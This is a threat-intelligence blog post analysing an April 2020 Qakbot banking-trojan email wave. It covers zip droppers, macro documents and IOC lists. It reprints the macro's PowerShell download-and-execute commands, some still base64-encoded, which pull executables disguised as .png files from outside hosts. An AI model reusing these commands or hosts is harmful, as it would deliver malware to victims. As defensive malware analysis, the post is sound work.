Multiple Qakbot (Qbot) waves detected in April 2020

1 Comment / Infosec News, Malware / By

Since last month there have been significant resurgence in Qbot. Different Qbot waves were reported like “feature“, “extend“, “string” and “one-drive” wave. Several bot_groups spx85 to spx103 were found active for this Qakbot resurgence. In this post we will be going though detailed analysis of the Qbot wave -“feature wave” from bot_group spx98.

What is Qbot?

Qbot is Malwarebytes’ detection name for a large family of backdoor trojans that has been around in one form or another since 2009. Qbot is mainly a banking Trojan and password stealer. It is worth noting that most variants are sandbox/VM aware and some have polymorphic abilities too. Qbot main source were exploit kits but now they have started using email links and attachments on a large scale.

Analysis of this new wave – chain of events

1. Delivery Method – Email attachment / Link

Email Samples from Feature wave – 16th April 2020

Email sample from Differ wave -17th April 2020

2. Dropping Initial payload – zip file

When user click on the link “ATTACHMENT_DOWNLOAD”, it drops the zip file from the link embedded in above emails. Some of the initial zip file payload dropping links observed in emails were:

  • hxxp://braincricket[.]com/feature/10510/10510.zip – VT Analysis
  • hxxp://bouyonclip[.]com/feature/66981937/66981937.zip – VT analysis
  • hxxp://bread[.]karenkee[.]com/feature/9494249/9494249.zip – VT analysis
  • hxxp://careon[.]io/feature/553382.zip – VT analysis
  • hxxp://cloudtunez[.]com/feature/0160397.zip – VT analysis

3. Extracting Mal Doc and Enabled Macros

Screenshot of downloaded Zip file and extracted doc file

Upon opening the word doc, when enable editing is clicked. It enables macros leading to silent powershell code execution, which tries to establish link with 6 URLs to further drop the Qbot payload (PE) name as .png files.

4. PowerShell code and commands found embedded in the Maldoc

Encoded and Decoded Codes 1:

cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt 

cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('hxxp://automatischer-staubsauger[.]com/feature/777777[.]png')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('C:\Users\Public\tmpdir\file')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt

Encoded Code 2:

powershell  -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2RlbW8uY2FnbGlmaWNpb2NsZXJpY2kuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '2' + '.e' + 'x' + 'e')  

powershell  -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('hxxp://demo.caglificioclerici[.]com/feature/777777[.]png')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('C:\Users\Public\tmpdir\file')) + '2' + '.e' + 'x' + 'e')

Encoded Code 3:

powershell  -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2FuYW1pa2FpbmRhbmVnYXMuaW4vZmVhdHVyZS83Nzc3NzcucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '3' + '.e' + 'x' + 'e')  

powershell  -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('hxxp://anamikaindanegas[.]in/feature/777777[.]png')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('C:\Users\Public\tmpdir\file')) + '3' + '.e' + 'x' + 'e')

Encoded Code 4:

powershell  -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2RhaW9ocy5jb20udHcvZmVhdHVyZS83Nzc3NzcucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '4' + '.e' + 'x' + 'e')  

powershell  -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('hxxp://daiohs.com[.]tw/feature/777777[.]png')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('C:\Users\Public\tmpdir\file')) + '4' + '.e' + 'x' + 'e')

Encoded Code 5:

powershell  -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovLzM2MGRpZ2l0YWxjbGljay5jb20vZmVhdHVyZS83Nzc3NzcucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '5' + '.e' + 'x' + 'e')  

powershell  -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('hxxp://360digitalclick[.]com/feature/777777[.]png')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('C:\Users\Public\tmpdir\file')) + '5' + '.e' + 'x' + 'e')

5. Qbot Payload

All Qbot payload link observed in PowerShell command were serving different files with same name- 777777.png (PE file disguised as an Image file). PE File downloaded from the below mentioned links, rewrites itself to following path: c:\users\public\tmpdir\X.exe [Where X can be any integer]and is executed.

  • hxxp://demo.caglificioclerici[.]com/feature/777777[.]png
  • hxxp://daiohs.com[.]tw/feature/777777[.]png
  • hxxp://anamikaindanegas[.]in/feature/777777[.]png
  • hxxp://demo.caglificioclerici[.]com/feature/777777[.]png
  • hxxp://automatischer-staubsauger[.]com/feature/777777[.]png

IDS signatures flagging the drop of Qbot executable

PE being dropped as .PNG file

Brief Qbot PE analysis summary can be seen in below snapshot with process tree and associated shell commands observed during its analysis.

Behavioral analysis of the PE

For complete detailed analysis of the Qbot PE sample please visit the following links:

Threat Intel – IOCs

Common pattern and behavior among all waves detected in April 2020

  • Email with Attachment or link.
  • Link drops the randomly figured 4-9 digits .zip file. For example: 10510.zip, 82386.zip and etc.
  • Most of the Zip file have a doc file named in several formats:
    1. Format one: Judgment_X.doc
    2. Format two: Judgment_X_X.doc
    3. Format two: NUM_X.vbs
  • All the Qbot payload observed were disguised in Image file format -.png. For example: 4444.png, 777777.png, 999999.png and etc.
NOTE: Where X can be any random number of any length, usually between 3-9

There are tons of IOCs observed across this month, I have tried compiling them from different sources into one place for you all. These IOCs include zip files, URLs, hashes and Qbot PE(png files).

“Evolving Wave” is the most latest one, targeting individuals and corporate. Stay tuned for more upcoming IOCs.

#Qbot #malware #april #spx_bot #waves #extend_wave #string_wave #feature_wave #differ_wave #vary_wave #evolving_wave

Stay tuned for more Cyber stuff !!

1 thought on “Multiple Qakbot (Qbot) waves detected in April 2020”

  1. Pingback: Multiple Qakbot (Qbot) waves detected in April 2020

Leave a Comment

Your e-mail address will not be published. Required fields are marked *